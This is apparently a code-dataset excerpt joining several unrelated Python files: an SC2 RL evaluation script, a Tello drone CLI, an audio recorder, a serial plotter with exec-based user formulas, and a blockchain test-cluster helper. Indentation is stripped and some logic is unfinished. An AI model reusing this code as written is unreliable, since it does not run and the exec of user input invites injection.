flags.DEFINE_string("device", USED_DEVICES, "Device for training.")
# AbyssalReef
# Simple64
# Simple96
# Flat64
# Flat32
flags.DEFINE_string("map", "AbyssalReef", "Name of a map to use.")
flags.DEFINE_bool("render", False, "Whether to render with pygame.")
flags.DEFINE_integer("screen_resolution", 64, "Resolution for screen feature layers.")
flags.DEFINE_integer("minimap_resolution", 64, "Resolution for minimap feature layers.")
flags.DEFINE_enum("agent_race", "T", sc2_env.races.keys(), "Agent's race.")
flags.DEFINE_enum("bot_race", "T", sc2_env.races.keys(), "Bot's race.")
flags.DEFINE_enum("difficulty", "A", sc2_env.difficulties.keys(), "Bot's strength.")
flags.DEFINE_integer("max_agent_steps", 18000, "Total agent steps.")
flags.DEFINE_integer("step_mul", 8, "Game steps per agent step.")
flags.DEFINE_bool("profile", False, "Whether to turn on code profiling.")
flags.DEFINE_bool("trace", False, "Whether to trace the code execution.")
flags.DEFINE_bool("save_replay", False, "Whether to replays_save a replay at the end.")
flags.DEFINE_string("replay_dir", "multi-agent/", "dir of replay to replays_save.")
flags.DEFINE_string("restore_model_path", "./model/20190222-125322_source/", "path for restore model")
flags.DEFINE_bool("restore_model", True, "Whether to restore old model")
# flags.DEFINE_string("restore_mini_path", "./model/20190221-213138_source/", "path for restore mini")
# flags.DEFINE_bool("restore_mini", True, "Whether to restore old model")
flags.DEFINE_integer("parallel", 10, "How many processes to run in parallel.")
flags.DEFINE_integer("thread_num", 1, "How many thread to run in the process.")
flags.DEFINE_integer("port_num", 24370, "the start port to create distribute tf")
flags.DEFINE_integer("max_iters", 1, "the rl agent max run iters")
flags.DEFINE_integer("game_num", 100, "How many games to evaluate.")
flags.DEFINE_string("game_version", None, "game version of SC2")
flags.DEFINE_string("log_file", "./result/19-02-21_TvT_Simple64_log.txt", "log file to save data")
# nohup python main.py > result.out &
# kill -9 `ps -ef |grep liuruoze | grep Main_Thread | awk '{print $2}' `
# kill -9 `ps -ef |grep liuruoze | grep main.py | awk '{print $2}' `
# kill -9 `ps -ef |grep lrz | grep main.py | awk '{print $2}' `
# ps -ef | grep 'SC2_x64' | awk '{print $2}' | xargs kill -9
# ps -ef |grep pangzhj | grep 'main.py'
# ps -ef | grep liuruoze | grep -v sshd
# export -n http_proxy
# export -n https_proxy
# kill -9 `ps -ef |grep liuruoze | awk '{print $2}' `
# kill -9 `ps -ef |grep liuruoze | grep test_prototype.py | awk '{print $2}' `
# kill -9 `ps -ef |grep lrz | grep main.py | awk '{print $2}' `
# fuser -v /dev/nvidia*
# python -m pysc2.bin.play --map Simple64 --agent2 pysc2.agents.random_agent.RandomAgent
# python -m pysc2.bin.agent --map Simple64 --agent pysc2.agents.base_agent.BaseAgent --agent2 Bot
FLAGS(sys.argv)
# set the play map
play_map = C.get_map_class('lib.config.' + FLAGS.map)
C.my_sub_pos = play_map.my_sub_pos
C.enemy_sub_pos = play_map.enemy_sub_pos
C.enemy_main_pos = play_map.enemy_main_pos
C.rally_pos = play_map.rally_pos
C.attack_pos_queue = play_map.attack_pos_queue
C.base_camera_pos = play_map.base_camera_pos
DIFF = 1
if not FLAGS.on_server:
PARALLEL = 1
THREAD_NUM = 1
MAX_AGENT_STEPS = 18000
DEVICE = ['/gpu:0']
NUM_FOR_UPDATE = 2
TRAIN_ITERS = 5
PORT_NUM = FLAGS.port_num
else:
PARALLEL = FLAGS.parallel
THREAD_NUM = FLAGS.thread_num
MAX_AGENT_STEPS = FLAGS.max_agent_steps
# DEVICE = ['/gpu:' + dev for dev in FLAGS.device.split(',')]
DEVICE = ['/cpu:0']
NUM_FOR_UPDATE = FLAGS.num_for_update
TRAIN_ITERS = FLAGS.max_iters
PORT_NUM = FLAGS.port_num
LOG = FLAGS.log_path
if not os.path.exists(LOG):
os.makedirs(LOG)
SERVER_DICT = {"worker": [], "ps": []}
FLAGS(sys.argv)
THREAD_NUM = PARALLEL
# define some global variable
LOCK = threading.Lock()
UPDATE_EVENT, ROLLING_EVENT = threading.Event(), threading.Event()
COUNTER = 0
WAITING_COUNTER = 0
#Difficulty_list = [1, 2, 3, 4, 5, 6, 7, 8, 9, 'A']
# Difficulty_list = [1, 2, 3, 4, 5, 6, 7]
Difficulty_list = [7]
Reward_list = [1, 0, -1]
RESULT_ARRAY = np.zeros((len(Difficulty_list), len(Reward_list)))
GAME_NUM = FLAGS.game_num
PER_GAME_NUM = GAME_NUM // PARALLEL
def run_thread(agent, Synchronizer):
global COUNTER, WAITING_COUNTER, GAME_NUM, PER_GAME_NUM
C._FPS = 2.8
step_mul = FLAGS.step_mul
for difficulty in Difficulty_list:
with sc2_env.SC2Env(
map_name=FLAGS.map,
agent_race=FLAGS.agent_race,
bot_race=FLAGS.bot_race,
difficulty=difficulty,
step_mul=step_mul,
score_index=-1,
screen_size_px=(FLAGS.screen_resolution, FLAGS.screen_resolution),
minimap_size_px=(FLAGS.minimap_resolution, FLAGS.minimap_resolution),
visualize=False, game_steps_per_episode=900 * 22.4) as env:
# Only for a single player!
agent.set_env(env)
if difficulty == "A":
C.difficulty = 10
else:
C.difficulty = difficulty
for j in range(PER_GAME_NUM):
agent.play()
reward = agent.result['reward']
with LOCK:
RESULT_ARRAY[Difficulty_list.index(difficulty), Reward_list.index(reward)] += 1
COUNTER += 1
print("difficulty %s: finished %d games!" % (difficulty, COUNTER))
agent.reset()
time.sleep(2)
if ROLLING_EVENT.is_set():
ROLLING_EVENT.clear()
WAITING_COUNTER += 1
if WAITING_COUNTER == PARALLEL:
UPDATE_EVENT.set()
if agent.index == 0:
UPDATE_EVENT.wait()
# assert RESULT_ARRAY[Difficulty_list.index(difficulty)].sum() == FLAGS.game_num
# assert WAITING_COUNTER == PARALLEL
# assert COUNTER == GAME_NUM
win = RESULT_ARRAY[Difficulty_list.index(difficulty), Reward_list.index(1)]
fair = RESULT_ARRAY[Difficulty_list.index(difficulty), Reward_list.index(0)]
lose = RESULT_ARRAY[Difficulty_list.index(difficulty), Reward_list.index(-1)]
log_file = open(FLAGS.log_file, "a")
log_file.write('difficulty: %s, game_num: %d\n' % (difficulty, GAME_NUM))
log_file.write('win: %d, %.2f\n' % (int(win), win / GAME_NUM))
log_file.write('fair: %d, %.2f\n' % (int(fair), fair / GAME_NUM))
log_file.write('loss: %d, %.2f\n\n' % (int(lose), lose / GAME_NUM))
log_file.close()
UPDATE_EVENT.clear()
ROLLING_EVENT.set()
WAITING_COUNTER = 0
COUNTER = 0
ROLLING_EVENT.wait()
if agent.index == 0:
Synchronizer.wait()
def Worker(index, update_game_num, Synchronizer, cluster, model_path):
config = tf.ConfigProto(
allow_soft_placement=True, log_device_placement=False,
)
config.gpu_options.allow_growth = True
worker = tf.train.Server(cluster, job_name="worker", task_index=index, config=config)
sess = tf.Session(target=worker.target, config=config)
Net = MiniNetwork(sess=sess, summary_writer=None, rl_training=FLAGS.training,
cluster=cluster, index=index, device=DEVICE[index % len(DEVICE)],
ppo_load_path=FLAGS.restore_model_path, ppo_save_path=model_path)
global_buffer = Buffer()
agents = []
for i in range(THREAD_NUM):
agent = terran_source_agent.SourceAgent(index=i, global_buffer=global_buffer, net=Net,
restore_model=FLAGS.restore_model, rl_training=FLAGS.training,
strategy_agent=None)
agents.append(agent)
print("Worker %d: waiting for cluster connection..." % index)
sess.run(tf.report_uninitialized_variables())
print("Worker %d: cluster ready!" % index)
while len(sess.run(tf.report_uninitialized_variables())):
print("Worker %d: waiting for variable initialization..." % index)
time.sleep(1)
print("Worker %d: variables initialized" % index)
UPDATE_EVENT.clear()
ROLLING_EVENT.set()
# Run threads
threads = []
for i in range(THREAD_NUM - 1):
t = threading.Thread(target=run_thread, args=(agents[i], Synchronizer))
threads.append(t)
t.daemon = True
t.start()
time.sleep(3)
run_thread(agents[-1], Synchronizer)
for t in threads:
t.join()
def Parameter_Server(Synchronizer, cluster, log_path, model_path):
config = tf.ConfigProto(
allow_soft_placement=True, log_device_placement=False,
)
config.gpu_options.allow_growth = True
server = tf.train.Server(cluster, job_name="ps", task_index=0, config=config)
sess = tf.Session(target=server.target, config=config)
#Net = HierNetwork(sess=sess, summary_writer=None, rl_training=FLAGS.training)
#agent = multi_agent.MultiAgent(index=-1, net=Net, restore_model=FLAGS.restore_model, rl_training=FLAGS.training)
summary_writer = tf.summary.FileWriter(log_path)
Net = MiniNetwork(sess=sess, summary_writer=summary_writer, rl_training=FLAGS.training,
cluster=cluster, index=0, device=DEVICE[0 % len(DEVICE)],
ppo_load_path=FLAGS.restore_model_path, ppo_save_path=model_path)
agent = terran_source_agent.SourceAgent(index=-1, net=Net, restore_model=FLAGS.restore_model, rl_training=FLAGS.training)
print("Parameter server: waiting for cluster connection...")
sess.run(tf.report_uninitialized_variables())
print("Parameter server: cluster ready!")
print("Parameter server: initializing variables...")
agent.init_network()
print("Parameter server: variables initialized")
Synchronizer.wait()
print("done!")
def _main(unused_argv):
"""Run agents"""
maps.get(FLAGS.map) # Assert the map exists.
# create distribute tf cluster
start_port = FLAGS.port_num
SERVER_DICT["ps"].append("localhost:%d" % start_port)
for i in range(1):
SERVER_DICT["worker"].append("localhost:%d" % (start_port + 1 + i))
Cluster = tf.train.ClusterSpec(SERVER_DICT)
now = datetime.now()
model_path = "./model/" + now.strftime("%Y%m%d-%H%M%S") + "_source/"
if not os.path.exists(model_path):
os.makedirs(model_path)
log_path = "./logs/" + now.strftime("%Y%m%d-%H%M%S") + "_source/"
if FLAGS.restore_model:
C._LOAD_MODEL_PATH = FLAGS.restore_model_path
Synchronizer = mp.Barrier(1 + 1)
# Run parallel process
procs = []
for index in range(1):
p = mp.Process(name="Worker_%d" % index, target=Worker, args=(index, 0, Synchronizer, Cluster, model_path))
procs.append(p)
p.daemon = True
p.start()
time.sleep(1)
Parameter_Server(Synchronizer, Cluster, log_path, model_path)
for p in procs:
p.join()
if FLAGS.profile:
print(stopwatch.sw)
if __name__ == "__main__":
app.run(_main)
|
control_cli.py
|
"""
@title
@description
"""
import argparse
import threading
from auto_drone.drone.tello_drone import TelloDrone
class ControlCli:
def __init__(self, drone: TelloDrone):
self.drone = drone
self.running = False
self.option_menu = {
'exit': self.destroy,
}
# move_option_list = {f'move {direction.name}': direction.value for direction in MoveDirection}
# flip_option_list = {f'flip {direction.name}': direction.value for direction in FlipDirection}
# rotate_option_list = {f'rotate {direction.name}': direction.value for direction in RotateDirection}
# self.option_menu = dict(self.option_menu, **move_option_list)
# self.option_menu = dict(self.option_menu, **flip_option_list)
# self.option_menu = dict(self.option_menu, **rotate_option_list)
return
def display_menu(self):
print(str(self.drone))
for idx, (option_name, option_func) in enumerate(self.option_menu.items()):
print(f'{idx}: {" ".join(option_name.lower().split("_"))}')
return
def run_menu(self):
        # todo: add a check that the drone is connected
self.running = True
        user_prompt = 'Enter the index of a displayed option: '
user_option = ''
while self.running:
self.display_menu()
# todo add input validation
user_option = int(input(user_prompt))
print(user_option)
return
def destroy(self):
self.drone.cleanup()
return
def main(main_args):
"""
:param main_args:
:return:
"""
send_delay = main_args.get('send_delay', 0.1)
scan_delay = main_args.get('scan_delay', 0.1)
###################################
tello_drone = TelloDrone()
tello_drone.NETWORK_SCAN_DELAY = scan_delay
tello_drone.SEND_DELAY = send_delay
tello_drone.connect()
control_cli = ControlCli(drone=tello_drone)
###################################
print(tello_drone)
# connect call blocks until connected
connect_thread = threading.Thread(
        target=tello_drone.connect,  # pass the bound method; calling it here would connect synchronously
args=(),
daemon=True
)
connect_thread.start()
###################################
control_cli.run_menu()
return
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='')
parser.add_argument('--timeout', type=float, default=1,
help='')
args = parser.parse_args()
main(vars(args))
|
audio_recorder.py
|
import tkinter as tk
import threading
import pyaudio
import wave
class App():
chunk = 1024
sample_format = pyaudio.paInt16
channels = 2
fs = 44100
frames = []
def __init__(self, master):
self.isrecording = False
self.button1 = tk.Button(main, text='Start', width=6,
command=self.startrecording)
self.button2 = tk.Button(main, text='Stop', width=6,
command=self.stoprecording)
self.button1.pack()
self.button2.pack()
def startrecording(self):
self.p = pyaudio.PyAudio()
self.stream = self.p.open(format=self.sample_format,
channels=self.channels, rate=self.fs,
frames_per_buffer=self.chunk, input=True)
self.isrecording = True
        self.button1['state'] = 'disabled'
print('Recording')
t = threading.Thread(target=self.record)
t.start()
def stoprecording(self):
self.isrecording = False
print('Recording Completed')
self.filename = input('Name the file?')
self.filename = self.filename + ".wav"
wf = wave.open(self.filename, 'wb')
wf.setnchannels(self.channels)
wf.setsampwidth(self.p.get_sample_size(self.sample_format))
wf.setframerate(self.fs)
wf.writeframes(b''.join(self.frames))
wf.close()
main.destroy()
def record(self):
while self.isrecording:
data = self.stream.read(self.chunk)
self.frames.append(data)
main = tk.Tk()
main.title('Audio Recorder')
main.minsize(width=250, height=70)
app = App(main)
main.mainloop()
|
Serial.py
|
'''
Created on 25.10.2016
@author: simon
'''
import numpy as np
from devices import *
import serial,time,parser
import serial.tools.list_ports as lscoms
from collections import deque
from threading import Thread
from gui.terminator import terminatehooks
import traceback
def parsefn(s):
    # Build a one-argument function from the expression string `s`, with all
    # numpy names available inside the expression (e.g. "sin(x[0])").
    namespace = dict(vars(np))
    try:
        exec("def func(x):\n    return %s" % s, namespace)
    except Exception:
        traceback.print_exc()
        raise
    return namespace['func']
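# Illustrative example (not from the original source): parsefn("x[0] + sin(x[1])")
# returns a function f with f([1.0, 0.0]) == 1.0, because numpy's names
# (sin, cos, pi, ...) are injected into the exec namespace above.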
class Serial(DeviceBase):
name="Serial"
def __init__(self,maxlen=0):
DeviceBase.__init__(self)
self.maxlen=maxlen
self.idx=0
self.serial=serial.Serial()
#for dev in lscoms.comports():print dev
self.fnstr="#Recalculate Values. \nx[0] \nx[1]"
self.fns=[]
self.comports=[p[0] for p in lscoms.comports()]
self.port=0
self.secected_comport=self.comports[0]
self.baud=100000
terminatehooks.append(self.disable)
def disable(self):
print "closing Ports"
self.enabled=False
self.serial.close()
def gen(self):
self.idx+=1
return (self.idx,np.sin(float(self.idx)/60)+np.random.rand(),np.random.rand())
def next(self):
if self.idx<self.maxlen or self.maxlen==0: return self.serial.readline()#self.gen()
else: raise StopIteration()
def read(self): return ','.join(map(str,self.gen()[1:]))
def __iter__(self):return self
def dialog(self,master):
from PyQt4 import QtCore, QtGui
grid=QtGui.QGridLayout()
frame=QtGui.QFrame(master)
frame.setLayout(grid)
self.baudwg=QtGui.QLineEdit(str(self.baud))
grid.addWidget(QtGui.QLabel("Baudrate"),0,0)
grid.addWidget(self.baudwg,0,1)
opts=self.comports[:5]
self.cbox=cbox=QtGui.QComboBox()
cbox.addItems(opts)
self.cbox.setCurrentIndex(self.port)
grid.addWidget(QtGui.QLabel("ComPort"),1,0)
grid.addWidget(cbox,1,1)
self.fnswdg=QtGui.QTextEdit()
self.fnswdg.setPlainText(self.fnstr)
grid.addWidget(self.fnswdg,2,0,6,2)
#frame.setMinimumHeight(300)
return frame
    def ok(self,event):
        # leftover hook from an earlier Tk-based dialog; tkSimpleDialog is not imported in this module
        print(self.master.focus_get())
        if not self.master.focus_get()==self.fns:
            tkSimpleDialog.Dialog.ok(self.master, event)
def dialog_ok(self):
self.baud=int(self.baudwg.text())
self.port=self.cbox.currentIndex()
        print(self.port, self.baud)
self.serial.port=self.comports[self.port]
self.serial.baudrate=self.baud
self.fnstr=str(self.fnswdg.toPlainText())
self.fns=self.parsefns(str(self.fnswdg.toPlainText()))
self._enable()
t=Thread(target=self.run).start()
pass
def run(self):
from devices import plot as gui
gui.initplot()
self.serial.rtscts=True
self.serial.dsrdtr=True
p=SerialWorker(self.serial.port,self.serial.baudrate,self.fnstr)
p.start()
#self.serial.open()
#for i in self.next().split(','): gui.pltAddLine(0)
for i in p.queue.get(): gui.pltAddLine(0)
gui.selectedlines.update(gui.lines)
datalen=len(gui.lines)
print "expecting %d vlues per line"%datalen
pbuff=deque(maxlen=50)
self.ts=time.time()
self.samples=0
#self.serial.__ini
#self.serial.flushInput()
while self.enabled:
self.samples+=1
if time.time()-self.ts>1 and self.samples>100:
srate=self.samples/(time.time()-self.ts)
self.samples=0
#print self.q.qsize()
self.ts=time.time()
gui.samplerate=srate
gui.master.statusmsgs['srate']="%d/s"%srate
#str=self.next()
try:
#i=map(float,str.split(','))
data=p.queue.get()
i=data['values']
#print i
s=data['raw']+' '+','.join(["%+05.2f"%j for j in i])
gui.addtxt(s)
if self.record: self.record.write(s)
if len(i)>datalen:
for j in i[datalen:]:
gui.pltAddLine(0)
gui.selectedlines.update(gui.lines)
datalen=len(gui.lines)
datalen=len(gui.lines)
for l in gui.lines[datalen:]:l.buffer.idx=gui.lines[0].buffer.idx
                for j in range(datalen):
val=0
try:val=i[j]
except IndexError:i.append(0)
gui.pltAppendPoints(i)
            except (IndexError, ValueError) as e: print("dataerr", e)
p.stop()
p.join()
        print('p-term')
#self.serial.close()
@classmethod
def parsefns(self,txt):
lines=txt.split('\n')
fns=[]
for l in lines:
l=l.strip()
if l and l[0]=="#": continue
elif l:
                try: fns.append(parsefn(l))
                except Exception: print("Error in Fn", l)
return fns
devices.append(Serial())
def parsefns(txt):
lines=txt.split('\n')
fns=[]
for l in lines:
l=l.strip()
if l and l[0]=="#": continue
elif l:
            try: fns.append(parsefn(l))
            except Exception: print("Error in Fn", l)
return fns
from multiprocessing import Process, Value,Queue,Event
import io
class SerialWorker(Process):
def __init__(self,port,baud,fnstr=None):
self.fnstr= fnstr
self.fns=[]
self.enabled=Value('i')
self.enabled.value=1
self.queue=Queue()
self.port=port
self.baud=baud
Process.__init__(self)
def run(self):
self.fns=parsefns(self.fnstr)
self.serial=serial.Serial()
self.serial.port=self.port
self.serial.baudrate=self.baud
#sio = io.TextIOWrapper(io.BufferedReader(self.serial))
self.serial.open()
self.mode=''
print "starting serial reading"
while self.enabled.value:
            s0 = self.serial.readline().decode(errors='ignore').replace('\r', '')
#s0=sio.readline()
if s0[0]=='b':
self.mode=s0
s0=s0[1:]
try:#print s0
s=s0.split(',')
try:
vals=[]#map(float,s)
for v in s:
try : vals.append(float(v))
except: pass
# if len(self.fns)<len(vals):
# for i in range(len(self.fns),len(vals)):
# self.fns.append(lambda x: x[i])
newvals=[]
i=0
for fn in self.fns:
try: vals.append(fn(vals))
except IndexError: pass
i+=1
except ValueError:vals=[]
data={'values':vals,'raw':repr(self.mode+'-'+s0)}
self.queue.put(data)
except: pass
self.serial.close()
def stop(self):
self.enabled.value=0
|
cluster.py
|
import base64
import configparser
import datetime
import enum
import hashlib
import json
import os
import re
import socket
import subprocess
import sys
import tempfile
import threading
import time
import uuid
from pathlib import Path
from typing import List
import bech32
import docker
import durations
import jsonmerge
import multitail2
import tomlkit
import yaml
from dateutil.parser import isoparse
from supervisor import xmlrpc
from supervisor.compat import xmlrpclib
from . import ports
from .utils import build_cli_args_safe, format_doc_string, interact, write_ini
CHAIN = "" # edit by nix-build
if not CHAIN:
CHAIN = os.environ.get("CHAIN_MAIND", "chain-maind")
ZEMU_HOST = "127.0.0.1"
ZEMU_BUTTON_PORT = 9997
ZEMU_GRPC_SERVER_PORT = 3002
# dockerfile is integration_test/hardware_wallet/Dockerfile
ZEMU_IMAGE = "cryptocom/builder-zemu:latest"
IMAGE = "docker.pkg.github.com/crypto-com/chain-main/chain-main-pystarport:latest"
COMMON_PROG_OPTIONS = {
# redirect to supervisord's stdout, easier to collect all logs
"autostart": "true",
"autorestart": "true",
"redirect_stderr": "true",
"startsecs": "3",
}
SUPERVISOR_CONFIG_FILE = "tasks.ini"
class ModuleAccount(enum.Enum):
FeeCollector = "fee_collector"
Mint = "mint"
Gov = "gov"
Distribution = "distribution"
BondedPool = "bonded_tokens_pool"
NotBondedPool = "not_bonded_tokens_pool"
IBCTransfer = "transfer"
def home_dir(data_dir, i):
return data_dir / f"node{i}"
class Ledger:
def __init__(self):
self.ledger_name = f"ledger_simulator_{uuid.uuid4().time_mid}"
self.proxy_name = f"ledger_proxy_{uuid.uuid4().time_mid}"
self.grpc_name = f"ledger_grpc_server_{uuid.uuid4().time_mid}"
self.cmds = {
self.ledger_name: [
"./speculos/speculos.py",
"--display=headless",
f"--button-port={ZEMU_BUTTON_PORT}",
"./speculos/apps/crypto.elf",
],
self.proxy_name: ["./speculos/tools/ledger-live-http-proxy.py", "-v"],
self.grpc_name: ["bash", "-c", "RUST_LOG=debug zemu-grpc-server"],
}
self.client = docker.from_env()
self.client.images.pull(ZEMU_IMAGE)
self.containers = []
def start(self):
host_config_ledger = self.client.api.create_host_config(
auto_remove=True,
port_bindings={
ZEMU_BUTTON_PORT: ZEMU_BUTTON_PORT,
ZEMU_GRPC_SERVER_PORT: ZEMU_GRPC_SERVER_PORT,
},
)
container_ledger = self.client.api.create_container(
ZEMU_IMAGE,
self.cmds[self.ledger_name],
name=self.ledger_name,
ports=[ZEMU_BUTTON_PORT, ZEMU_GRPC_SERVER_PORT],
host_config=host_config_ledger,
)
self.client.api.start(container_ledger["Id"])
self.containers.append(container_ledger)
for name in [self.proxy_name, self.grpc_name]:
cmd = self.cmds[name]
try:
host_config = self.client.api.create_host_config(
auto_remove=True, network_mode=f"container:{self.ledger_name}"
)
container = self.client.api.create_container(
ZEMU_IMAGE,
cmd,
name=name,
host_config=host_config,
)
self.client.api.start(container["Id"])
self.containers.append(container)
time.sleep(2)
except Exception as e:
print(e)
def stop(self):
for container in self.containers:
try:
self.client.api.remove_container(container["Id"], force=True)
print("stop docker {}".format(container["Name"]))
except Exception as e:
print(e)
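# Lifecycle sketch for the Ledger class above (hedged: assumes docker and the
# ZEMU_IMAGE are available locally, as start() already requires):
#
#     ledger = Ledger()
#     ledger.start()
#     try:
#         ...  # run ledger-backed CLI calls, e.g. ClusterCLI.create_account_ledger
#     finally:
#         ledger.stop()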
class LedgerButton:
def __init__(self, zemu_address, zemu_button_port):
self._client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.zemu_address = zemu_address
self.zemu_button_port = zemu_button_port
self.connected = False
@property
def client(self):
if not self.connected:
time.sleep(5)
self._client.connect((self.zemu_address, self.zemu_button_port))
self.connected = True
return self._client
def press_left(self):
data = "Ll"
self.client.send(data.encode())
def press_right(self):
data = "Rr"
self.client.send(data.encode())
def press_both(self):
data = "LRlr"
self.client.send(data.encode())
class ChainCommand:
def __init__(self, cmd=None):
self.cmd = cmd or CHAIN
def __call__(self, cmd, *args, stdin=None, **kwargs):
"execute chain-maind"
args = " ".join(build_cli_args_safe(cmd, *args, **kwargs))
return interact(f"{self.cmd} {args}", input=stdin)
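# Usage sketch for ChainCommand above (hedged: it assumes build_cli_args_safe
# renders keyword arguments as `--flag value` pairs and drops None values,
# which is how every caller in this module uses it; the address is a placeholder):
#
#     raw = ChainCommand("chain-maind")
#     raw("query", "bank", "balances", "cro1...", output="json",
#         node="tcp://127.0.0.1:26657")
#
# shells out to roughly:
#
#     chain-maind query bank balances cro1... --output json --node tcp://127.0.0.1:26657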
class ClusterCLI:
"the apis to interact with wallet and blockchain prepared with Cluster"
def __init__(
self,
data,
chain_id,
cmd=None,
zemu_address=ZEMU_HOST,
zemu_button_port=ZEMU_BUTTON_PORT,
):
self.data_root = data
self.chain_id = chain_id
self.data_dir = data / chain_id
self.config = json.load((self.data_dir / "config.json").open())
self.raw = ChainCommand(cmd)
self._supervisorctl = None
self.leger_button = LedgerButton(zemu_address, zemu_button_port)
self.output = None
self.error = None
@property
def supervisor(self):
"http://supervisord.org/api.html"
# copy from:
# https://github.com/Supervisor/supervisor/blob/76df237032f7d9fbe80a0adce3829c8b916d5b58/supervisor/options.py#L1718
if self._supervisorctl is None:
self._supervisorctl = xmlrpclib.ServerProxy(
# dumbass ServerProxy won't allow us to pass in a non-HTTP url,
# so we fake the url we pass into it and
# always use the transport's
# 'serverurl' to figure out what to attach to
"http://127.0.0.1",
transport=xmlrpc.SupervisorTransport(
serverurl=f"unix://{self.data_root}/supervisor.sock"
),
)
return self._supervisorctl.supervisor
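    # Usage sketch for the property above (hedged: getAllProcessInfo is part of
    # supervisord's documented XML-RPC API; it assumes supervisord is already
    # running behind the unix socket under data_root):
    #
    #     for proc in cli.supervisor.getAllProcessInfo():
    #         print(proc["name"], proc["statename"])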
def reload_supervisor(self):
subprocess.run(
[
sys.executable,
"-msupervisor.supervisorctl",
"-c",
self.data_root / SUPERVISOR_CONFIG_FILE,
"update",
],
check=True,
)
def nodes_len(self):
"find how many 'node{i}' sub-directories"
return len(
[p for p in self.data_dir.iterdir() if re.match(r"^node\d+$", p.name)]
)
def create_node(
self, base_port=None, moniker=None, hostname="localhost", statesync=False
):
"""create new node in the data directory,
process information is written into supervisor config
start it manually with supervisor commands
:return: new node index and config
"""
i = self.nodes_len()
# default configs
if base_port is None:
            # use node0's base_port + i * 10 as the default base port for the new node
base_port = self.config["validators"][0]["base_port"] + i * 10
if moniker is None:
moniker = f"node{i}"
# add config
assert len(self.config["validators"]) == i
self.config["validators"].append(
{
"base_port": base_port,
"hostname": hostname,
"moniker": moniker,
}
)
(self.data_dir / "config.json").write_text(json.dumps(self.config))
# init home directory
self.init(i)
home = self.home(i)
(home / "config/genesis.json").unlink()
(home / "config/genesis.json").symlink_to("../../genesis.json")
# use p2p peers from node0's config
node0 = tomlkit.parse((self.data_dir / "node0/config/config.toml").read_text())
def custom_edit_tm(doc):
if statesync:
info = self.status()["sync_info"]
doc["statesync"].update(
{
"enable": True,
"rpc_servers": ",".join(self.node_rpc(i) for i in range(2)),
"trust_height": int(info["earliest_block_height"]),
"trust_hash": info["earliest_block_hash"],
"temp_dir": str(self.data_dir),
"discovery_time": "5s",
}
)
edit_tm_cfg(
home / "config/config.toml",
base_port,
node0["p2p"]["persistent_peers"],
custom_edit=custom_edit_tm,
)
edit_app_cfg(home / "config/app.toml", base_port)
# create validator account
self.create_account("validator", i)
# add process config into supervisor
path = self.data_dir / SUPERVISOR_CONFIG_FILE
ini = configparser.RawConfigParser()
ini.read_file(path.open())
chain_id = self.config["chain_id"]
prgname = f"{chain_id}-node{i}"
section = f"program:{prgname}"
ini.add_section(section)
ini[section].update(
dict(
COMMON_PROG_OPTIONS,
command=f"{self.raw.cmd} start --home %(here)s/node{i}",
autostart="false",
stdout_logfile=f"%(here)s/node{i}.log",
)
)
with path.open("w") as fp:
ini.write(fp)
self.reload_supervisor()
return i
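    # Sketch of the flow in the docstring above (the moniker is illustrative):
    # create the node, then start the supervisor program that create_node just
    # registered under the "{chain_id}-node{i}" name.
    #
    #     i = cli.create_node(moniker="fullnode", statesync=True)
    #     cli.supervisor.startProcess(f"{cli.chain_id}-node{i}")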
def home(self, i):
"home directory of i-th node"
return home_dir(self.data_dir, i)
def base_port(self, i):
return self.config["validators"][i]["base_port"]
def node_rpc(self, i):
"rpc url of i-th node"
return "tcp://127.0.0.1:%d" % ports.rpc_port(self.base_port(i))
# for query
def ipport_grpc(self, i):
"grpc url of i-th node"
return "127.0.0.1:%d" % ports.grpc_port(self.base_port(i))
# tx broadcast only
def ipport_grpc_tx(self, i):
"grpc url of i-th node"
return "127.0.0.1:%d" % ports.grpc_port_tx_only(self.base_port(i))
def node_id(self, i):
"get i-th node's tendermint node id"
output = self.raw("tendermint", "show-node-id", home=self.home(i))
return output.decode().strip()
def create_account(self, name, i=0, mnemonic=None):
"create new keypair in i-th node's keyring"
if mnemonic is None:
output = self.raw(
"keys",
"add",
name,
home=self.home(i),
output="json",
keyring_backend="test",
)
else:
output = self.raw(
"keys",
"add",
name,
"--recover",
home=self.home(i),
output="json",
keyring_backend="test",
stdin=mnemonic.encode() + b"\n",
)
return json.loads(output)
def create_account_ledger(self, name, i=0):
"create new ledger keypair"
def send_request():
try:
self.output = self.raw(
"keys",
"add",
name,
"--ledger",
home=self.home(i),
output="json",
keyring_backend="test",
)
except Exception as e:
self.error = e
t = threading.Thread(target=send_request)
t.start()
time.sleep(3)
for _ in range(0, 3):
self.leger_button.press_right()
time.sleep(0.2)
self.leger_button.press_both()
t.join()
if self.error:
raise self.error
return json.loads(self.output)
def init(self, i):
"the i-th node's config is already added"
return self.raw(
"init",
self.config["validators"][i]["moniker"],
chain_id=self.chain_id,
home=self.home(i),
)
def validate_genesis(self, i=0):
return self.raw("validate-genesis", home=self.home(i))
def add_genesis_account(self, addr, coins, i=0, **kwargs):
return self.raw(
"add-genesis-account",
addr,
coins,
home=self.home(i),
output="json",
**kwargs,
)
def gentx(self, name, coins, i, min_self_delegation=1):
return self.raw(
"gentx",
name,
amount=coins,
min_self_delegation=str(min_self_delegation),
home=self.home(i),
chain_id=self.chain_id,
keyring_backend="test",
)
def collect_gentxs(self, gentx_dir, i=0):
return self.raw("collect-gentxs", gentx_dir, home=self.home(i))
def status(self, i=0):
return json.loads(self.raw("status", node=self.node_rpc(i)))
def block_height(self, i=0):
return int(self.status(i)["sync_info"]["latest_block_height"])
def block_time(self, i=0):
return isoparse(self.status(i)["sync_info"]["latest_block_time"])
def balance(self, addr, i=0):
coin = json.loads(
self.raw(
"query", "bank", "balances", addr, output="json", node=self.node_rpc(i)
)
)["balances"]
if len(coin) == 0:
return 0
coin = coin[0]
assert coin["denom"] == "basecro"
return int(coin["amount"])
def distribution_commision(self, addr, i=0):
coin = json.loads(
self.raw(
"query",
"distribution",
"commission",
addr,
output="json",
node=self.node_rpc(i),
)
)["commission"][0]
return float(coin["amount"])
def distribution_community(self, i=0):
coin = json.loads(
self.raw(
"query",
"distribution",
"community-pool",
output="json",
node=self.node_rpc(i),
)
)["pool"][0]
return float(coin["amount"])
def distribution_reward(self, delegator_addr, i=0):
coin = json.loads(
self.raw(
"query",
"distribution",
"rewards",
delegator_addr,
output="json",
node=self.node_rpc(i),
)
)["total"][0]
return float(coin["amount"])
def address(self, name, i=0, bech="acc"):
output = self.raw(
"keys",
"show",
name,
"-a",
home=self.home(i),
keyring_backend="test",
bech=bech,
)
